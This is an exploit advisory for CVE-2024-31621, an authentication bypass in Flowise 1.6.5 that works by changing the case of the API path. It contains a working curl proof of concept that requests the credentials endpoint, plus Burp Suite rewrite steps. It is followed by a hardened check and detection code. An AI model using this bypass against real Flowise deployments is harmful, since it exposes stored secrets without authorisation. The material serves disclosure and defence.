Flowise 1.6.5 Authentication Bypass
2024-4-22 04:32:26 Author: cxsecurity.com

# Exploit Title: Flowise 1.6.5 - Authentication Bypass
# Date: 17-April-2024
# Exploit Author: Maerifat Majeed
# Vendor Homepage: https://flowiseai.com/
# Software Link: https://github.com/FlowiseAI/Flowise/releases
# Version: 1.6.5
# Tested on: mac-os
# CVE : CVE-2024-31621

Flowise versions <= 1.6.5 are vulnerable to an authentication bypass. The code snippet

```javascript
this.app.use((req, res, next) => {
    if (req.url.includes('/api/v1/')) {
        whitelistURLs.some((url) => req.url.includes(url)) ? next() : basicAuthMiddleware(req, res, next)
    } else next()
})
```

puts the authentication middleware in front of every endpoint under /api/v1, except a few whitelisted endpoints. The check is case-sensitive, so it only matches the lowercase /api/v1 prefix; a request that changes the path to uppercase, such as /API/V1, bypasses the authentication.

POC:

curl http://localhost:3000/Api/v1/credentials

For a seamless authentication bypass, use the Burp Suite "Match and replace" rules in the proxy settings: add a rule on "Request first line" replacing api/v1 with API/V1.
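The following is an added example, not Flowise's own code, that models the decision the quoted middleware makes so the defect and a fix can be exercised offline without Express. The `whitelistURLs` entries, the sample log lines and the function names are constructed for illustration. Express matches routes case-insensitively by default, which is why `/Api/v1/credentials` still reaches the same handler as `/api/v1/credentials`; any guard placed in front of the router therefore has to normalise case before comparing. The hardened variant also fails closed on a malformed path, and a small detection helper flags access-log lines that hit the API prefix in non-canonical casing.

```javascript
// Constructed sample whitelist (not Flowise's real list).
const whitelistURLs = ['/api/v1/verify/apikey/', '/api/v1/public-chatflows/'];

// Vulnerable decision, mirroring the advisory: case-sensitive substring
// match on the raw request URL. Returns true when auth must be enforced.
function requiresAuthVulnerable(reqUrl) {
  if (reqUrl.includes('/api/v1/')) {
    return !whitelistURLs.some((url) => reqUrl.includes(url));
  }
  return false;
}

// Hardened decision: parse the URL once, decode and lower-case the path,
// then compare prefixes. Anything that cannot be parsed is treated as
// protected (fail closed) rather than silently passed through.
function requiresAuthHardened(reqUrl) {
  let path;
  try {
    const { pathname } = new URL(reqUrl, 'http://placeholder.invalid');
    path = decodeURIComponent(pathname).toLowerCase();
  } catch (_err) {
    return true; // malformed percent-encoding or URL: do not let it through
  }
  if (!path.startsWith('/api/v1/')) return false;
  return !whitelistURLs.some((url) => path.startsWith(url.toLowerCase()));
}

// Detection: return request paths that reach /api/v1 in any casing other
// than the canonical lowercase form. Input is common-log-format lines.
function findCaseVariantRequests(logLines) {
  const hits = [];
  for (const line of logLines) {
    const m = line.match(/"(?:GET|POST|PUT|DELETE|PATCH) (\S+)/);
    if (!m) continue;
    const path = m[1];
    if (/^\/api\/v1\//i.test(path) && !path.startsWith('/api/v1/')) {
      hits.push(path);
    }
  }
  return hits;
}

// Constructed access-log lines, not from a real deployment.
const sampleLog = [
  '10.0.0.5 - - [17/Apr/2024:10:00:01 +0000] "GET /api/v1/credentials HTTP/1.1" 401 -',
  '10.0.0.5 - - [17/Apr/2024:10:00:07 +0000] "GET /Api/v1/credentials HTTP/1.1" 200 1532',
  '10.0.0.9 - - [17/Apr/2024:10:00:09 +0000] "GET /health HTTP/1.1" 200 2',
];

console.log('vulnerable, /Api/v1/credentials needs auth:', requiresAuthVulnerable('/Api/v1/credentials'));
console.log('hardened,   /Api/v1/credentials needs auth:', requiresAuthHardened('/Api/v1/credentials'));
console.log('suspicious paths in log:', findCaseVariantRequests(sampleLog));
```

The hardened check compares normalised path prefixes rather than searching the whole URL string, so the decision depends only on the resource actually being routed to; the detection helper is a cheap retrospective check for environments that ran an affected version.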
Source: https://cxsecurity.com/issue/WLB-2024040048